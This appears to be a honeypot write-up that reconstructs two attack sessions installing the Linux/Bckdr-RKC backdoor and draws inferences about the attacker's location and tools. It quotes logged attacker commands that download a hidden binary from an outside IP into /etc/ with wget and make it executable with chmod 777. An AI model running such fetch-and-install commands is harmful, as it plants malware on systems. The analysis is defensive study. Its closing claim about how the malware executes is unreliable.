You can tell a lot about an attacker based upon their methods of attack.
-Automated attacks happen rapidly, with no time for typing
-Manual attacks happen slowly, as the attacker has to type commands
-Typos and misspellings indicate a manual attack
-Connection string will give away what kind of operating system the attacker is using
Let's take a look at both pieces of the Linux/Bckdr-RKC malware I've received.
.xsyslog
First seen 2011-12-21 11:56:26
User connected from 64.62.224.250 (This is a United States IP address, no host name)
User SSH client was SSH-2.0-libssh2_1.3.0
11:56:27: User downloaded .xsyslog to /etc/ using "wget -P/etc/ http://216.83.44.229:99/.xsyslog"
11:56:28: User granted executable permission using "chmod 777 /etc/.xsyslog"
11:56:28: User performed a "cat /proc/version"
14:04:06: User disconnected
.ssyslog
First seen 2011-12-24 06:54:03
User connected from 61.147.75.6 (This is a Chinese IP address, no host name)
User SSH client was SSH-2.0-libssh2_1.3.0
06:54:06: User downloaded .ssyslog to /etc/ using "wget -P/etc/ http://216.83.44.229:99/.ssyslog" at
06:54:08: User granted executable permission using "chmod 777 /etc/.ssyslog"
06:54:09: User performed a "cat /proc/version"
06:55:42: User disconnected
08:53:24: User reconnected and retried above procedure from 61.147.75.6
09:01:49: User disconnected
10:37:44: User reconnected and retried above procedure from 61.147.75.6 (did not disconnect)
Then a second connection appears:
User connected from 87.217.199.83 (83.199.217.87.dynamic.jazztel.es - from Spain)
User SSH client was SSH-2.0-PuTTY_Release_0.60
10:49:58: User connected and manually mistyped root password as 1234567
10:50:00: User re-entered correct root password as 123456
User proceeded to try and open common Linux text editors "nano" and "pico"
User attempted to install "nano" and "pico" using yum.
10:51:05: Frustrated, the user sent a reboot command
10:51:23: 87.217.199.83 disconnects
10:57:36: 61.147.75.6 disconnects
What can we learn about the attacker from the above sequence of events?
- Both .xsyslog and .ssyslog were delivered by a libssh2 client, indicating a non-windows system
- The remote install of .xsyslog and .ssyslog may be automated, due to the rapid entry of commands
- The remote install of .ssyslog was being monitored by its botmaster, who attempted to actually debug why the malware was not phoning home
- The botmaster/attacker has some working knowledge of how the .xsyslog and .ssyslog malware functions, and attempted to troubleshoot, indicating he/she is not simply a "script kiddy" using someone else's malware
- The botmaster is possibly located in Spain, or relayed through a compromised system in Spain
- The botmaster uses a Windows system, since the troubleshooting connection was performed using Putty.
Similarities between .xsyslog and its later counterpart, .ssyslog:
- Both pieces of malware were hosted by the same IP address.
- Both pieces of malware are placed in the /etc/ folder
- Both pieces of malware are executed by running /proc/version